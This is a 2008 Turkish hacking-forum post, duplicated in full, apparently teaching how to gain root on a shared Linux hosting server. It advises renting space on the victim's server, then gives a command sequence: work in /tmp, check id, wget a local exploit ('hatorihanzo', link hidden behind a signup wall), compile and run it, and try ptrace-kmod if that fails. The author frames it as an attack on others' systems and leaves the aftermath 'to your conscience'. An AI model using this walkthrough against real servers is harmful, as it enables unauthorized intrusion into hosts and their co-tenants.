rootlama teknikleri

**DArKNESS®** · 01-30-2008

Linux sistemlerinde yetkili duruma gelmek rootlamak???

Burada kullanacğımız exploit Local exploittir�Bu tür local saldırılar size bi kardes tavsiyesi(: kendinize bir ftp almak ama kurbanın hostununda aynı serverda bulunması gerekior� bunu nasıl bulcaz diosanız [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...] gibi sitelerden hostlara info çekerek şirket isimlerini görmek ki orada l inklerde veriliyor�ya domaini whois cekmek [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...] gibi sitelerden bakabilirsiniz�

Öncelikle bizim dosyalarımızı yazabileceğimiz rahat çalışabileceğimiz bir dizine yani o sıradaki yapılan işlemlerin yazılabileceği bir dizine ihtiyacımız var� nedir diye sorduğunuzu duyar gibiyim�
Tmp dizini yeterli olur herhalde sorunuza (: devam ediyoruz�

$ cd /tmp

Pwd yapıyoruz�

$ pwd

/tmp (diye bir şey gelecek muhtemelen bizim o dizinde olduğumuzu söylüyor )

Tamam hemen yetkilere göz atıyoruz�

$ id

uid=55554(nobody) gid=55554(nobody) groups=55554(nobody)

bu demektirki bir biz bir hiçiz emin olmak için;

$ whoami

nobody

evet artık emin olduk hiç bir şeyiz hemen exploitimizi çekiyoruz�
$ wget [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...]

Download işlemi bittikten sonra hemen;

$ ls

hatorihanz****

bu dosyayı gördüyseniz sorun yok demektir.Hemen bu exploiti derleyelim�

$ gcc hatorihanz**** -o hatorihanzo

Hemen bu exploite çalışma izni verelim (chmod 7777 yapalım yani)

$ chmod +x hatorihanzo

İzin kabul edilmiştir işte geldik kader anına exploiti çalıştıracaz ve exploit sistemi rootlamaya çalısacak�

$ ./ hatorihanzo

Eğer �$� işareti �#� olmuşsa sistemi rootlamışsınızdır�Olmadımı?
Sizimi kırıcam hemen dosya desteği istiyoruz�

$ /lib/ld-linux.so.2 ./hatorihanzo

Root olmuşsanız yani �$� �#� olmuşsa gerisi sizin vicdanınza kalmış olmamışsa değişik exploitleri kullanın örnek; ptrace-kmod Kolay gelsin�
Not: bu sistemden cıktığınızda her girdiğinizde aynı işlemleri tekrar gerçekleştirerek yine [root] olabilirsiniz�

01-30-2008	#1
DArKNESS® Özel Üye Türkiyenin En Kaliteli Bilgi Paylasim Mekani AKdenizForum.. Kullanıcı Bilgileri Üyelik Tarihi: Aug 2007 Mesajlar: 4.493 Üye No: 25971 Extra Bilgiler Tecrübe Puanı: 29 Rep Gücü : 75 Rep Derecesi : İletişim	rootlama teknikleri Linux sistemlerinde yetkili duruma gelmek rootlamak??? Burada kullanacğımız exploit Local exploittir�Bu tür local saldırılar size bi kardes tavsiyesi(: kendinize bir ftp almak ama kurbanın hostununda aynı serverda bulunması gerekior� bunu nasıl bulcaz diosanız [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...] gibi sitelerden hostlara info çekerek şirket isimlerini görmek ki orada l inklerde veriliyor�ya domaini whois cekmek [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...] gibi sitelerden bakabilirsiniz� Öncelikle bizim dosyalarımızı yazabileceğimiz rahat çalışabileceğimiz bir dizine yani o sıradaki yapılan işlemlerin yazılabileceği bir dizine ihtiyacımız var� nedir diye sorduğunuzu duyar gibiyim� Tmp dizini yeterli olur herhalde sorunuza (: devam ediyoruz� $ cd /tmp Pwd yapıyoruz� $ pwd /tmp (diye bir şey gelecek muhtemelen bizim o dizinde olduğumuzu söylüyor ) Tamam hemen yetkilere göz atıyoruz� $ id uid=55554(nobody) gid=55554(nobody) groups=55554(nobody) bu demektirki bir biz bir hiçiz emin olmak için; $ whoami nobody evet artık emin olduk hiç bir şeyiz hemen exploitimizi çekiyoruz� $ wget [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...] Download işlemi bittikten sonra hemen; $ ls hatorihanz** bu dosyayı gördüyseniz sorun yok demektir.Hemen bu exploiti derleyelim� $ gcc hatorihanz -o hatorihanzo Hemen bu exploite çalışma izni verelim (chmod 7777 yapalım yani) $ chmod +x hatorihanzo İzin kabul edilmiştir işte geldik kader anına exploiti çalıştıracaz ve exploit sistemi rootlamaya çalısacak� $ ./ hatorihanzo Eğer �$� işareti �#� olmuşsa sistemi rootlamışsınızdır�Olmadımı? Sizimi kırıcam hemen dosya desteği istiyoruz� $ /lib/ld-linux.so.2 ./hatorihanzo Root olmuşsanız yani �$� �#� olmuşsa gerisi sizin vicdanınza kalmış olmamışsa değişik exploitleri kullanın örnek; ptrace-kmod Kolay gelsin� Not: bu sistemden cıktığınızda her girdiğinizde aynı işlemleri tekrar gerçekleştirerek yine [root] olabilirsiniz� AkdenizForum Toolbar Sitemizi Daha İyi Kullanmak İstiyorsanız Daha Kolaylıkla Sizde İndirin [ÜYE OLMADAN LİNKLERİ GÖREMEZSİNİZ. BURAYA TIKLAYARAK BEDAVA ÜYE OLUN...]**

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder